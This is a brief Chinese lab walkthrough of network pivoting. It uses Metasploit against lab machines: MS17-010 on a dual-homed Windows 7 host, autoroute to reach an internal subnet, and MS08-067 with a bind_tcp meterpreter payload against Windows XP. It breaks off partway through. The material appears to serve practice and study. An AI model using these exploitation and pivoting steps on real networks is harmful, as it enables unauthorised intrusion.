基础配置
查看IP
环境
攻击机:kali(nat) 192.168.10.128
靶机:win7(nat、主机;双网卡)192.168.10.131 192.168.17.128
Winxp(主机) 192.168.17.129
攻击过程
1.通过ms17-010漏洞拿到win7主机权限
2.通过meterpreter终端获取系统控制台shell,执行ipconfig发现主机存在双网段
执行arp -a命令
发现内网存在192.168.17.129的主机
3. 返回meterpreter终端将内网网段192.168.17.0/24添加至路由表,使用 autoroute 脚本;
run autoroute -s 192.168.17.0/24
run autoroute -p //查看路由表映射情况
4.将会话退出到后台 background
这里是知道内网主机是winXP 直接使用ms08067进行攻击
注意:这里payload只能使用正向连接
set payload windows/meterpreter/bind_tcp
查看到winxp的ip